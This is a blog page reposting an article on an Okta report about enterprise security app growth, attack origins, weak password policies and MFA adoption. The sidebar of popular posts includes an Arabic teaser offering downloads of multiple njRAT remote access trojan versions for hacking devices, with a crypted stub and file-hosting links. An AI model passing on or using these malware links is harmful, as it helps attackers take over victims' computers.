!Security in the enterprise: Things are looking up


Cybersecurity is quickly becoming the number one business priority, says identity and access management company Okta.
Based on the results of an analysis of authentication and verification events made through the company’s enterprise offerings between November 1, 2016 to October 31, 2017, security tools by Jamf, KnowBe4, DigiCert, Cisco, Mimecast, Sophos, and CloudFlare all ranked in the top 15 fastest growing apps for the first time.
security enterprise 2018
“Jamf, which provides software for managing and securing Apple devices, is a notable newcomer to the list and the fastest growing app in our network with 389% year-over-year growth. Security awareness training company, KnowBe4 grew 290% in the past year, indicating organizations’ increased focus on training employees around security best practices and ways to combat social engineering attacks,” the company noted.
These results definitely point to companies having increased security spending.


 

Identity attacks originate worldwide

By pairing their security data and the data provided by open source threat intel feeds, the company was able to analyze attacks targeted at the cloud authentication layer.
What they discovered is that 23% of all attacks came from Tor exit nodes, and of the rest, 48% of attacks are coming from IPs geolocated in China, followed by 7.7% from the United States, 4.5% from France, 3.4% from Russia and 2.6% from the Netherlands.
“Unless you have a reason to interact with Tor, we’d suggest just blocking those IPs,” the company advised to enterprise admins.

Passwords and multi-factor authentication

To see what companies are doing to protect users against online credential-based attacks (brute force, password spraying, phishing), Okta took the average password policies of its customers and tested them against an open source list of passwords relied on by security researchers.
They discovered that only 50% would have passed the standard length test requirement of 8 or more characters and that only 4% of companies have a policy that requires passwords to have more than 8 characters, at least one uppercase letter, one lowercase letter, and one number.
“Despite the increasing sophistication in password guessing algorithms, organizations can still minimize the risk of both brute force and password spraying attacks by (1) increasing the minimum password length and optional complexity and (2) enforcing policies that rule out common/breached passwords, and (3) enforcing MFA on all logins,” the company noted.
One good news is that multi-factor authentication continues to grow among Okta’s customers – currently, nearly 70 percent of them offer three or more factor options to their users.
The bad news is that security questions and SMS – two of the least secure options – are the definite favorites:
security enterprise 2018
“The security question is viewed as convenient and unobtrusive, so it makes sense that the popularity of the security question is growing,” says Joe Diamond, Director of Security Product Marketing Management at Okta.
“It’s one of the factors users are most familiar with, despite the fact that it adds little value to security, as many answers to typical security questions are a matter of public record.”

Other insights

According to the company’s numbers, the most popular apps by number of customers are Microsoft Office 365, Salesforce, Amazon AWS, G Suite, Box, Concur, and Slack.
If we go by the number of monthly active users, Microsoft Office 365 still comes on top, followed by Workday, ServiceNow, Salesforce, G Suite, Box, and Concur.
The most popular developer tools and services are JIRA, Github, Pager Duty, New Relic, and Atlassian Cloud.
The most popular eLearning apps are Lynda.com, Coursera, Pluralsight, Codecademy, and Safari.

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining...
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated ...
Read more